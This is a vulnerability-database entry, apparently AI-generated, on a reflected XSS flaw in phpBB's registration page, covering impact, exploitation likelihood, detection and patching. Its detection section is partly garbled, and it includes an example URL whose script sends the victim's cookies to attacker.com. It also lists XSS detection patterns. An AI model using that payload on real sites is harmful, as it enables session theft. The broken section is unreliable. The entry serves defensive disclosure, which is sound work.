
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-87901 is a reflected Cross-Site Scripting (XSS) vulnerability in the phpBB forum software's registration module, caused by improper sanitization of user-supplied input. It affects phpBB versions 3.3.0 through 3.3.18 and was published on October 23, 2026. The vulnerability carries a CVSS v3.0 base score of 8.3 (High) and is classified under CWE-79 (GitHub Advisory). A patch has been made available for versions beyond 3.3.18 (GitHub Advisory).
The root cause is improper neutralization of user-controllable input in the phpBB registration module before it is rendered in the browser (CWE-79). An unauthenticated attacker can craft a malicious URL containing injected JavaScript that, when visited by a victim, is reflected back by the server and executed in the victim's browser context without adequate sanitization or encoding. The attack requires no privileges and has low complexity, but does require user interaction (i.e., the victim must click a crafted link). No public proof-of-concept exploit code has been identified at this time (GitHub Advisory).
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of the victim's browser session on the phpBB registration page. This can lead to session cookie theft, credential harvesting, unauthorized actions performed on behalf of the victim, or redirection to malicious sites. The confidentiality and integrity impacts are rated High, with a Low availability impact, reflecting the potential for significant data exposure and account compromise (GitHub Advisory).
No public proof-of-concept exploit code has been identified, and there is no evidence of active in-the-wild exploitation at this time. The EPSS score is approximately 0.39% (0.003930), indicating a low near-term probability of exploitation. The CVE status is listed as "Deferred" and it has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (GitHub Advisory).
/ucp.php?mode=register) on the target phpBB instance.https://target.example.com/ucp.php?mode=register¶m=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>./ucp.php?mode=register) containing encoded script tags or JavaScript event handlers in URL parameters.%3Cscript%3E, %3C/script%3E, onerror=, onload=) in query string parameters.Administrators should upgrade phpBB to a version newer than 3.3.18, which contains the fix for this vulnerability (GitHub Advisory, phpBB Community). As interim mitigations, implement a Content Security Policy (CSP) header to restrict inline script execution, and apply a Web Application Firewall (WAF) rule to block requests containing script injection patterns targeting the registration endpoint. Ensure all user-supplied input in the registration module is properly validated and output-encoded before rendering.
The vulnerability was noted on Mastodon via security-focused accounts shortly after publication, and standard CVE tracking services (VulDB, CVEFeed, CIRCL) indexed it promptly (GitHub Advisory). No significant vendor statements beyond the phpBB community forum post or notable researcher commentary have been identified at this time.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."